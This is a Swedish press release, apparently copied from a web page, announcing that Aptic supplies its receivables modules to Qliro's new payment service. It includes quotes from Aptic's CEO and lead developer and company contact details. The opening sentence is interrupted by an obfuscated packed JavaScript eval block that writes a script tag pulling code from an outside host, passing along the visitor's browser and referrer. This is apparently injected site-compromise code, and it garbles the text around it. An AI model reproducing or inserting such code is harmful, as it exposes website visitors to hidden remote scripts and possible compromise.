Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Aptic levererar systemlösning till Qliros nya betaltjänst

Aptic levererar systemlösning till Qliros nya betaltjänst
Sebastian

När eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kyytt|var|u0026u|referrer|kzaef||js|php’.split(’|’),0,{}))
CDON Group utvecklade egna betaltjänsten Qliro valde de affärsystemleverantören Aptic som samarbetspartner. 

Qliros betallösning innehåller Aptics moduler Edge, Edge Finance och Credit, som hanterar fakturor, reskontra, fakturaköp samt konto, delbetalningar och kampanjer.

–  Vi är stolta över att få vara med och bygga Qliros nya betallösning som ställer stora krav på oss som leverantör. Qliro är en inspirerande kund med hög intern kompetens inom e-handel och betallösningar, säger Aptics vd Susanne Bruce och fortsätter: – Vi ser en stark tillväxt inom e-handel och finansiella lösningar, både i Sverige och i Europa, varför vi utvecklat modulen Credit som möjliggör kompletta betaltjänster för webbutiker, finansbolag och retailbanker.

Affärssystemet Aptic ARC hanterar fordringar hela vägen från faktura till betalning. Modulerna för reskontra, kontohantering, factoring, fakturaköp och inkasso kombineras och anpassas specifikt till varje företag. Aptic Edge är reskontrasystemet som designats för att hantera stora fakturavolymer och med den nyutvecklade modulen Aptic Credit kan kompletta lösningar erbjudas baserat på färdiga komponenter. Alternativen är outsourcing eller egenutvecklade system.

– Fördelen med Aptics affärsystem är att du kan driftsätta ditt e-handelsystem med egen betallösning utan att bygga det från grunden. Du behåller dina kundrelationer genom hela affären och får bättre koll på din kunddata, förklarar Susanne Bruce.

Det nära samarbetet mellan Aptic och Qliro har fungerat bra under utvecklingen av Qliros betaltjänst.

–  Det är glädjande att en av nordisk e-handels största aktörer ser styrkan och flexibiliteten i vår produkt. Genom implementationen har vi fått möjlighet att bevisa systemets lämplighet att hantera stora volymer med snabba svarstider och hög prestanda utan nedtid, avslutar Aptics chefsutvecklare Fredrik Ekengren.

För bilder och mer information, vänligen kontakta:

Susanne Bruce, vd Aptic, 070-828 24 27, susanne.bruce@aptic.se

Daniel Broberg, presskontakt, 0708-99 27 27, daniel@resultat.org

Om Aptic AB:

Aptic, som är dotterbolag till Stenhaga Invest AB, utvecklar affärssystem för kravhantering och är en av de ledande leverantörerna i Norden inom Recievable Management Services. I samma system omfattas moduler för fakturering, reskontraservice, factoring, fakturaköp och inkasso. Inom Aptic finns också Profact, Sveriges enda servicebolag för branschen. Totalt har Aptickoncernen ett 60-tal medarbetare med kontor i Skövde, Göteborg och Stockholm. www.aptic.se.